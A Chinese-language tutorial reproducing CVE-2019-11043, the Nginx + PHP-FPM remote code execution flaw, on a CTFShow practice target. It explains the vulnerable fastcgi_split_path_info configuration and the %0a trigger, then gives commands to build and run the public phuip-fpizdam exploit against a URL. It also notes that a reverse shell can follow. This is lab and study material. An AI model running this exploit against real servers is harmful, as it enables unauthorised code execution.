CVE-2019-11043复现和学习
漏洞描述
CVE-2019-11043 是一个远程代码执行漏洞,使用某些特定配置的 Nginx + PHP-FPM 的服务器存在漏洞,可允许攻击者远程执行代码。
向Nginx + PHP-FPM的服务器 URL发送 %0a 时,服务器返回异常。
该漏洞需要在nginx.conf中进行特定配置才能触发。
location ~ [^/]\.php(/|$) {
...
fastcgi_split_path_info ^(.+?\.php)(/.*)$;
fastcgi_param PATH_INFO $fastcgi_path_info;
fastcgi_pass php:9000;
...
}
攻击者可以使用换行符(%0a)来破坏fastcgi_split_path_info指令中的Regexp。Regexp被损坏导致PATH_INFO为空,从而触发该漏洞。
漏洞范围
在 Nginx + PHP-FPM 环境下,当启用了上述 Nginx 配置后,以下 PHP 版本受本次漏洞影响,另外,PHP 5.6版本也受此漏洞影响,但目前只能 Crash,不可以远程代码执行:
PHP 7.0 版本
PHP 7.1 版本
PHP 7.2 版本
PHP 7.3 版本
漏洞复现
这里用 CTFShow web311的环境来作为靶机复现
首先 exp 需要安装 GO 环境,有点麻烦可以参考一下
sudo apt install golang
git clone https://github.com/neex/phuip-fpizdam.git
cd phuip-fpizdam
到这步可能会报错,一直不能成功
是因为需要换代理,因为我就在这死磕很久
可以执行 go env 看看 proxy 是哪个
报错原因:默认使用的是proxy.golang.org,在国内无法访问
报错解决:执行命令:go env -w GOPROXY=https://goproxy.cn(换一个国内能够访问的代理地址
go get -v && go build
漏洞利用
./phuip-fpizdam URL/index.php
到这一步就已经可以RCE了
当然也是可以反弹 shell 的,可以看看这篇文章